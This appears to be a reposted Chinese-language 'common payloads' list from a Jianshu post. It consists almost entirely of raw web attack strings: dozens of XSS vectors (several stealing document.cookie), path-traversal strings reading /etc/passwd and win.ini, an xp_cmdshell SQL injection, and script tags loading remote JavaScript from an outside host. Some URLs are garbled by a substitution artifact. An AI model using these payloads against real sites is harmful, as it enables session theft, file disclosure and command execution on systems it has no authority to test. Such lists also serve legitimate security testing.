‘><script>alert(document.cookie)</script>
=‘><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(‘XSS‘)%3C/script%3E
<script>alert(‘XSS‘)</script>
<img src="JavaScript:alert(‘XSS‘)">
%0a%0a<script>alert(\"Vulnerable\")</script>.Jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/Title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.HTML
%3f.Jsp
%3f.Jsp
<script>alert(‘Vulnerable‘);</script>
<script>alert(‘Vulnerable‘)</script>
?sql_deBUG=1
a%5c.aspx
a.Jsp/<script>alert(‘Vulnerable‘)</script>
a/
a?<script>alert(‘Vulnerable‘)</script>
"><script>alert(‘Vulnerable‘)</script>
‘;exec%20master..xp_cmdshell%20‘dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt‘--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
<img src="JavaScript:alert(‘XSS‘);">
<img src=JavaScript:alert(‘XSS‘)>
<img src=JavaScript:alert(‘XSS‘)>
<img src=JavaScript:alert("XSS")>
<img src=JavaScript:alert(‘XSS‘)>
<img src=JavaScript:alert(‘XSS‘)>
<img src=javascript:alert('XSS')>
<img src="jav ascript:alert(‘XSS‘);">
<img src="jav ascript:alert(‘XSS‘);">
<img src="jav ascript:alert(‘XSS‘);">
"<img src=java\0script:alert(\"XSS\")>";‘ > out
<img src=" JavaScript:alert(‘XSS‘);">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="JavaScript:alert(‘XSS‘)">
<BODY ONLOAD=alert(‘XSS‘)>
<img DYNSRC="JavaScript:alert(‘XSS‘)">
<img LOWSRC="JavaScript:alert(‘XSS‘)">
<BGSOUND src="JavaScript:alert(‘XSS‘);">
<br size="&{alert(‘XSS‘)}">
<LAYER src="@R_419_6822@://xss.ha.ckers.org/a.Js"></layer>
<link REL="stylesheet" href="JavaScript:alert(‘XSS‘);">
<img src=‘vbscript:msgBox("XSS")‘>
<img src="mocha:[code]">
<img src="LiveScript:[code]">
<Meta @R_419_6822@-EQUIV="refresh" CONTENT="0;url=JavaScript:alert(‘XSS‘);">
<iframe src=JavaScript:alert(‘XSS‘)></iframe>
<FRAMESET><FRAME src=JavaScript:alert(‘XSS‘)></FRAME></FRAMESET>
<table BACKGROUND="JavaScript:alert(‘XSS‘)">
<div STYLE="background-image: url(JavaScript:alert(‘XSS‘))">
<div STYLE="behavIoUr: url(‘@R_419_6822@://www.how-to-Hack.org/exploit.HTML‘);">
<div STYLE="wIDth: Expression(alert(‘XSS‘));">
<STYLE>@im\port‘\ja\vasc\ript:alert("XSS")‘;</STYLE>
<img STYLE=‘xss:expre\ssion(alert("XSS"))‘>
<STYLE TYPE="text/JavaScript">alert(‘XSS‘);</STYLE>
<STYLE TYPE="text/CSS">.XSS{background-image:url("JavaScript:alert(‘XSS‘)");}</STYLE><A ></A>
<STYLE type="text/CSS">BODY{background:url("JavaScript:alert(‘XSS‘)")}</STYLE>
<BASE href="JavaScript:alert(‘XSS‘);//">
getURL("JavaScript:alert(‘XSS‘)")
a="get";b="URL";c="JavaScript:";d="alert(‘XSS‘);";eval(a+b+c+d);
<XML src="JavaScript:alert(‘XSS‘);">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(‘XSS‘);}</SCRIPT><"
<SCRIPT src="@R_419_6822@://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<img src="JavaScript:alert(‘XSS‘)"
<!--#exec cmd="/bin/echo ‘<SCRIPT SRC‘"--><!--#exec cmd="/bin/echo ‘=@R_419_6822@://xss.ha.ckers.org/a.Js></SCRIPT>‘"-->
<img src="@R_419_6822@://www.thesiteyouareon.com/somecommand.PHP?somevariables=malicIoUscode">
<SCRIPT a=">" src="@R_419_6822@://xss.ha.ckers.org/a.Js"></SCRIPT>
<SCRIPT =">" src="@R_419_6822@://xss.ha.ckers.org/a.Js"></SCRIPT>
<SCRIPT a=">" ‘‘ src="@R_419_6822@://xss.ha.ckers.org/a.Js"></SCRIPT>
<SCRIPT "a=‘>‘" src="@R_419_6822@://xss.ha.ckers.org/a.Js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="@R_419_6822@://xss.ha.ckers.org/a.Js"></SCRIPT>
<A href=@R_419_6822@://www.go@R_419_6822@://www.Google.com/ogle.com/>link</A>
作者:carsonsoding链接:@R_419_6822@s://www.jianshu.com/p/01377ad556f0来源:简书简书著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。
总结以上是内存溢出为你收集整理的常用payload全部内容,希望文章能够帮你解决常用payload所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)